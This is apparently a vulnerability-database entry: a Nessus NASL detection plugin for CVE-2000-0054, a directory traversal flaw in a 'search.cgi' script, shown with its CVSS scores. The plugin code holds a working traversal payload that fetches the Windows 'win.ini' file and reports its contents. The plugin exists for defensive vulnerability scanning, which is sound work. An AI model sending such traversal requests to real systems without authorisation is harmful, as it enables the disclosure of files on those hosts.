5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
0.141 Low
EPSS
Percentile
95.7%
The remote web server contains a CGI script that fails to sanitize user input to the ‘letter’ parameter of the ‘search.cgi’ script of directory traversal sequences. An unauthenticated attacker can exploit this issue to read arbitrary files from the affected host, subject to the privileges under which the web server runs.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if(description)
{
script_id(10101);
script_bugtraq_id(921);
script_version("1.40");
script_cve_id("CVE-2000-0054");
script_name(english:"Home Free search.cgi Traversal Arbitrary File Access");
script_set_attribute(attribute:"synopsis", value:
"A CGI script on the remote web server is vulnerable to a directory
traversal attack." );
script_set_attribute(attribute:"description", value:
"The remote web server contains a CGI script that fails to sanitize
user input to the 'letter' parameter of the 'search.cgi' script of
directory traversal sequences. An unauthenticated attacker can
exploit this issue to read arbitrary files from the affected host,
subject to the privileges under which the web server runs." );
script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2000/Jan/29" );
script_set_attribute(attribute:"solution", value:
"Remove this CGI from the server." );
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:U/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"plugin_publication_date", value: "2000/01/09");
script_set_attribute(attribute:"vuln_publication_date", value: "2000/01/04");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_end_attributes();
script_summary(english: "Attempts GET /cgi-bin/search.cgi?\..\..\file.txt");
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2000-2021 Tenable Network Security, Inc.");
script_family(english: "CGI abuses");
script_dependencie("find_service1.nasl", "http_version.nasl", "web_traversal.nasl");
script_require_ports("Services/www", 80);
script_exclude_keys("Settings/disable_cgi_scanning");
exit(0);
}
#
# The script code starts here
#
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
port = get_http_port(default:80);
if ( get_kb_item(strcat("www/", port, "/generic_traversal"))) exit(0);
foreach dir (cgi_dirs())
foreach ntdir (make_list('windows', 'winnt'))
{
url = strcat(dir, "/search.cgi?..\..\..\..\..\..\", ntdir, "\win.ini");
w = http_send_recv3(method:"GET", port:port, item: url);
if (isnull(w)) exit(0);
r = strcat(w[0], w[1], '\r\n', w[2]);
if ("[windows]" >< r || "[fonts]" >< r)
{
if (report_verbosity)
{
file = string(ntdir, "\\win.ini");
report = string(
"\n",
"Nessus was able to retrieve the contents of '", file, "' on the\n",
"remote host by sending the following request :\n",
"\n",
" ", build_url(port:port, qs:url), "\n"
);
if (report_verbosity > 1)
{
r2 = w[2];
if (strlen(r2) == 0) r2 = r;
report = string(
report,
"\n",
"Here are the contents :\n",
"\n",
" ", str_replace(find:'\n', replace:'\n ', string:r2), "\n"
);
}
security_warning(port:port, extra:report);
}
else security_warning(port);
exit(0);
}
}